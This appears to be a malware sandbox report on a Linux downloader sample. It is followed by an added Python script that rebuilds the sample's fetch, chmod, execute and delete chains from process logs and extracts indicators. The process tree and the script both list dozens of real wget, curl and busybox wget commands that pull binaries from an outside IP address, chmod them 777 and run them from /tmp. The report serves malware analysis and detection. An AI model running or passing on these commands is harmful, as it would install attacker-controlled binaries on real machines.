Analysis (this report is the debian9-armhf run, behavioral2)
max time kernel: 16s
max time network: 18s
platform: debian-9_armhf
resource: debian9-armhf-20240418-en
resource tags: arch:armhf, image:debian9-armhf-20240418-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
submitted: 24/11/2024, 01:31

Static task: static1
Behavioral task behavioral1: sample a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5N, resource ubuntu1804-amd64-20240611-en
Behavioral task behavioral2: sample a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5N, resource debian9-armhf-20240418-en
Behavioral task behavioral3: sample a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5N, resource debian9-mipsbe-20240729-en
Behavioral task behavioral4: sample a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5N, resource debian9-mipsel-20240611-en
General
Target: a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5N
Size: 10KB
MD5: a7136f5f7aad005f449adf4d9eb6e330
SHA1: b6cddbe652904c25cc2e6c5f3063fb13a4df6737
SHA256: a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5
SHA512: 246aa712ed98a0566dc01bd9c38641f09934c708bff0e9535d33a324e832016dc28f55477382fd2c5611a9b79d4b4430ff37fb83814b6fcbb5db8b06708b657e
SSDEEP: 192:8OyzO6my8zK4ZbHrTssv9my8zK4uHrTssiAl:CzOZzL
Malware Config
Signatures

File and Directory Permissions Modification (1 TTP, 9 IoCs)
Adversaries may modify file or directory permissions to evade defenses. Here every dropped file is made world-readable, -writable and -executable (chmod 777) before it is run.
- PID 692  chmod
- PID 729  chmod
- PID 753  chmod
- PID 720  chmod
- PID 769  chmod
- PID 775  chmod
- PID 781  chmod
- PID 787  chmod
- PID 795  chmod

Executes dropped EXE (9 IoCs)
- /tmp/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ  PID 693  duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ
- /tmp/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq  PID 721  u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq
- /tmp/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL  PID 730  MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL
- /tmp/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR27  PID 754  9kwPr9G14A3vuswrzArUFY6A7t5mjzTR27
- /tmp/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA  PID 770  znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA
- /tmp/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl  PID 776  kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl
- /tmp/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs  PID 782  42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs
- /tmp/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS  PID 788  1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS
- /tmp/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t  PID 796  I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t

Checks CPU configuration (1 TTP, 9 IoCs)
Checks CPU information which may indicate that the system is a virtual machine.
- File opened for reading: /proc/cpuinfo  process: curl  (9 occurrences, one per curl invocation)

Reads runtime system information (18 IoCs)
- File opened for reading: /proc/self/auxv  process: curl  (9 occurrences)
- File opened for reading: /proc/sys/crypto/fips_enabled  process: curl  (9 occurrences)

Caveat on the two signatures above: every hit is attributed to /usr/bin/curl, not to the sample and not to any of the dropped binaries. The C and crypto libraries curl loads read /proc/cpuinfo and /proc/self/auxv for CPU-feature detection and /proc/sys/crypto/fips_enabled to check for kernel FIPS mode when they initialise, so these reads are startup noise from the download tooling rather than evidence that the payload fingerprints the virtual machine. What the sample actually does is better judged from the chmod, execute and rm sequence in the process tree.

Writes file to tmp directory (9 IoCs)
Malware often drops required files in the /tmp directory. Here each write is curl -O saving a download into the sample's working directory, /tmp.
- File opened for modification: /tmp/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ  process: curl
- File opened for modification: /tmp/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL  process: curl
- File opened for modification: /tmp/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA  process: curl
- File opened for modification: /tmp/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl  process: curl
- File opened for modification: /tmp/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t  process: curl
- File opened for modification: /tmp/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq  process: curl
- File opened for modification: /tmp/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR27  process: curl
- File opened for modification: /tmp/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs  process: curl
- File opened for modification: /tmp/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS  process: curl
Processes
The sample behaves as a downloader: after deleting bins.sh from its working directory (/tmp) it runs the same loop for each of ten file names under http://216.126.231.240/bins/: try wget, curl -O and busybox wget in turn, chmod 777 the result, execute it from /tmp, then rm it. The trace ends at the tenth fetch (PID 798); no chmod, exec or rm for that file is recorded.

- PID 637  /tmp/a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5N  (cmdline: /tmp/a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5N)
  - PID 639  /bin/rm  (cmdline: /bin/rm bins.sh)
  - PID 641  /usr/bin/wget  (cmdline: wget http://216.126.231.240/bins/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ)
  - PID 668  /usr/bin/curl  (cmdline: curl -O http://216.126.231.240/bins/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ)  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - PID 685  /bin/busybox  (cmdline: /bin/busybox wget http://216.126.231.240/bins/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ)
  - PID 692  /bin/chmod  (cmdline: chmod 777 duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ)  [File and Directory Permissions Modification]
  - PID 693  /tmp/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ  (cmdline: ./duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ)  [Executes dropped EXE]
  - PID 695  /bin/rm  (cmdline: rm duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ)
  - PID 697  /usr/bin/wget  (cmdline: wget http://216.126.231.240/bins/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq)
  - PID 703  /usr/bin/curl  (cmdline: curl -O http://216.126.231.240/bins/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq)  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - PID 715  /bin/busybox  (cmdline: /bin/busybox wget http://216.126.231.240/bins/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq)
  - PID 720  /bin/chmod  (cmdline: chmod 777 u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq)  [File and Directory Permissions Modification]
  - PID 721  /tmp/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq  (cmdline: ./u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq)  [Executes dropped EXE]
  - PID 722  /bin/rm  (cmdline: rm u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq)
  - PID 723  /usr/bin/wget  (cmdline: wget http://216.126.231.240/bins/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL)
  - PID 725  /usr/bin/curl  (cmdline: curl -O http://216.126.231.240/bins/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL)  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - PID 726  /bin/busybox  (cmdline: /bin/busybox wget http://216.126.231.240/bins/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL)
  - PID 729  /bin/chmod  (cmdline: chmod 777 MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL)  [File and Directory Permissions Modification]
  - PID 730  /tmp/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL  (cmdline: ./MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL)  [Executes dropped EXE]
  - PID 732  /bin/rm  (cmdline: rm MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL)
  - PID 733  /usr/bin/wget  (cmdline: wget http://216.126.231.240/bins/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR27)
  - PID 740  /usr/bin/curl  (cmdline: curl -O http://216.126.231.240/bins/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR27)  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - PID 747  /bin/busybox  (cmdline: /bin/busybox wget http://216.126.231.240/bins/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR27)
  - PID 753  /bin/chmod  (cmdline: chmod 777 9kwPr9G14A3vuswrzArUFY6A7t5mjzTR27)  [File and Directory Permissions Modification]
  - PID 754  /tmp/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR27  (cmdline: ./9kwPr9G14A3vuswrzArUFY6A7t5mjzTR27)  [Executes dropped EXE]
  - PID 756  /bin/rm  (cmdline: rm 9kwPr9G14A3vuswrzArUFY6A7t5mjzTR27)
  - PID 757  /usr/bin/wget  (cmdline: wget http://216.126.231.240/bins/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA)
  - PID 764  /usr/bin/curl  (cmdline: curl -O http://216.126.231.240/bins/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA)  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - PID 768  /bin/busybox  (cmdline: /bin/busybox wget http://216.126.231.240/bins/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA)
  - PID 769  /bin/chmod  (cmdline: chmod 777 znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA)  [File and Directory Permissions Modification]
  - PID 770  /tmp/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA  (cmdline: ./znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA)  [Executes dropped EXE]
  - PID 771  /bin/rm  (cmdline: rm znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA)
  - PID 772  /usr/bin/wget  (cmdline: wget http://216.126.231.240/bins/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl)
  - PID 773  /usr/bin/curl  (cmdline: curl -O http://216.126.231.240/bins/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl)  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - PID 774  /bin/busybox  (cmdline: /bin/busybox wget http://216.126.231.240/bins/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl)
  - PID 775  /bin/chmod  (cmdline: chmod 777 kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl)  [File and Directory Permissions Modification]
  - PID 776  /tmp/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl  (cmdline: ./kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl)  [Executes dropped EXE]
  - PID 777  /bin/rm  (cmdline: rm kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl)
  - PID 778  /usr/bin/wget  (cmdline: wget http://216.126.231.240/bins/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs)
  - PID 779  /usr/bin/curl  (cmdline: curl -O http://216.126.231.240/bins/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs)  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - PID 780  /bin/busybox  (cmdline: /bin/busybox wget http://216.126.231.240/bins/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs)
  - PID 781  /bin/chmod  (cmdline: chmod 777 42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs)  [File and Directory Permissions Modification]
  - PID 782  /tmp/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs  (cmdline: ./42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs)  [Executes dropped EXE]
  - PID 783  /bin/rm  (cmdline: rm 42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs)
  - PID 784  /usr/bin/wget  (cmdline: wget http://216.126.231.240/bins/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS)
  - PID 785  /usr/bin/curl  (cmdline: curl -O http://216.126.231.240/bins/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS)  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - PID 786  /bin/busybox  (cmdline: /bin/busybox wget http://216.126.231.240/bins/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS)
  - PID 787  /bin/chmod  (cmdline: chmod 777 1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS)  [File and Directory Permissions Modification]
  - PID 788  /tmp/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS  (cmdline: ./1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS)  [Executes dropped EXE]
  - PID 789  /bin/rm  (cmdline: rm 1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS)
  - PID 790  /usr/bin/wget  (cmdline: wget http://216.126.231.240/bins/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t)
  - PID 791  /usr/bin/curl  (cmdline: curl -O http://216.126.231.240/bins/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t)  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - PID 793  /bin/busybox  (cmdline: /bin/busybox wget http://216.126.231.240/bins/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t)
  - PID 795  /bin/chmod  (cmdline: chmod 777 I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t)  [File and Directory Permissions Modification]
  - PID 796  /tmp/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t  (cmdline: ./I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t)  [Executes dropped EXE]
  - PID 797  /bin/rm  (cmdline: rm I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t)
  - PID 798  /usr/bin/wget  (cmdline: wget http://216.126.231.240/bins/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA)
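The process tree above is the same fetch, chmod 777, execute, rm loop repeated once per file name, and the signature panel fires mostly on curl's own /proc reads rather than on that loop. The following is an added example, not code from the sandbox or from the sample's author: it reconstructs each dropped file's lifecycle from per-process command lines and pulls out the IOCs. It assumes exec telemetry as (pid, parent pid, command line) tuples; SAMPLE_EVENTS is constructed here from the report's command lines for the first two binaries plus the unfinished final fetch, and the helper names (find_drop_chains, extract_iocs, DropChain) are mine.

```python
"""Added example: rebuild fetch -> chmod -> exec -> rm chains from exec
events and extract IOCs. Input is (pid, ppid, cmdline); here it is constructed
from the sandbox report, in production it would come from auditd/eBPF."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlparse

Event = Tuple[int, int, str]  # (pid, parent pid, command line)

# Constructed from the report's process tree (children of the dropper, PID 637):
# the first two binaries and the last, unfinished fetch.
SAMPLE_EVENTS: List[Event] = [
    (639, 637, "/bin/rm bins.sh"),
    (641, 637, "wget http://216.126.231.240/bins/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ"),
    (668, 637, "curl -O http://216.126.231.240/bins/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ"),
    (685, 637, "/bin/busybox wget http://216.126.231.240/bins/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ"),
    (692, 637, "chmod 777 duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ"),
    (693, 637, "./duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ"),
    (695, 637, "rm duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ"),
    (697, 637, "wget http://216.126.231.240/bins/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq"),
    (703, 637, "curl -O http://216.126.231.240/bins/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq"),
    (715, 637, "/bin/busybox wget http://216.126.231.240/bins/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq"),
    (720, 637, "chmod 777 u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq"),
    (721, 637, "./u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq"),
    (722, 637, "rm u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq"),
    (798, 637, "wget http://216.126.231.240/bins/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA"),
]

URL_RE = re.compile(r"https?://[^\s'\"]+")
FETCHERS = {"wget", "curl", "tftp", "ftpget"}  # busybox applets handled in _argv()


def _base(path: str) -> str:
    return path.rsplit("/", 1)[-1]


def _argv(cmdline: str) -> List[str]:
    argv = cmdline.split()
    # "/bin/busybox wget URL" is the same fetch as "wget URL"
    if len(argv) > 1 and _base(argv[0]) == "busybox":
        argv = argv[1:]
    return argv


@dataclass
class DropChain:
    """Lifecycle of one dropped file. fetch + chmod + exec is the high-confidence
    signal; the trailing rm (cleanup) is recorded but not required."""
    name: str
    urls: List[str] = field(default_factory=list)
    fetch_pids: List[int] = field(default_factory=list)
    chmod_pid: Optional[int] = None
    exec_pid: Optional[int] = None
    rm_pid: Optional[int] = None

    def complete(self) -> bool:
        return bool(self.fetch_pids) and self.chmod_pid is not None and self.exec_pid is not None


def find_drop_chains(events: List[Event]) -> Dict[str, DropChain]:
    chains: Dict[str, DropChain] = {}

    def chain_for(name: str) -> DropChain:
        if name not in chains:
            chains[name] = DropChain(name)
        return chains[name]

    for pid, _ppid, cmdline in events:
        argv = _argv(cmdline)
        if not argv:
            continue
        tool = _base(argv[0])
        if tool in FETCHERS:
            for url in URL_RE.findall(cmdline):  # key the chain on the URL's file name
                c = chain_for(_base(urlparse(url).path))
                if url not in c.urls:
                    c.urls.append(url)
                c.fetch_pids.append(pid)
        elif tool == "chmod" and len(argv) >= 3:
            chain_for(_base(argv[-1])).chmod_pid = pid
        elif tool == "rm" and len(argv) >= 2:
            name = _base(argv[-1])
            if name in chains:  # only files we saw fetched; "rm bins.sh" is ignored
                chains[name].rm_pid = pid
        elif argv[0].startswith(("./", "/tmp/")):  # execution out of the drop directory
            chain_for(tool).exec_pid = pid
    return chains


def extract_iocs(events: List[Event]) -> Dict[str, List[str]]:
    chains = find_drop_chains(events)
    urls = sorted({u for c in chains.values() for u in c.urls})
    hosts = sorted({urlparse(u).hostname or "" for u in urls} - {""})
    executed = sorted(n for n, c in chains.items() if c.complete())
    return {"urls": urls, "hosts": hosts, "executed": executed}


if __name__ == "__main__":
    for c in find_drop_chains(SAMPLE_EVENTS).values():
        state = "fetch+chmod+exec" if c.complete() else "incomplete"
        print(f"{c.name}: {state}, fetch pids {c.fetch_pids}, rm pid {c.rm_pid}")
    print(extract_iocs(SAMPLE_EVENTS))
```

Keying the detection on the chmod 777 plus execute-from-/tmp pair (with rm as a supporting indicator) avoids the false positives the signature panel shows for curl's /proc reads, and the incomplete chain for the last file name is exactly what a run cut off mid-loop looks like.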
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 153B
  MD5: 998368d7c95ea4293237f2320546e440
  SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
  SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
  SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97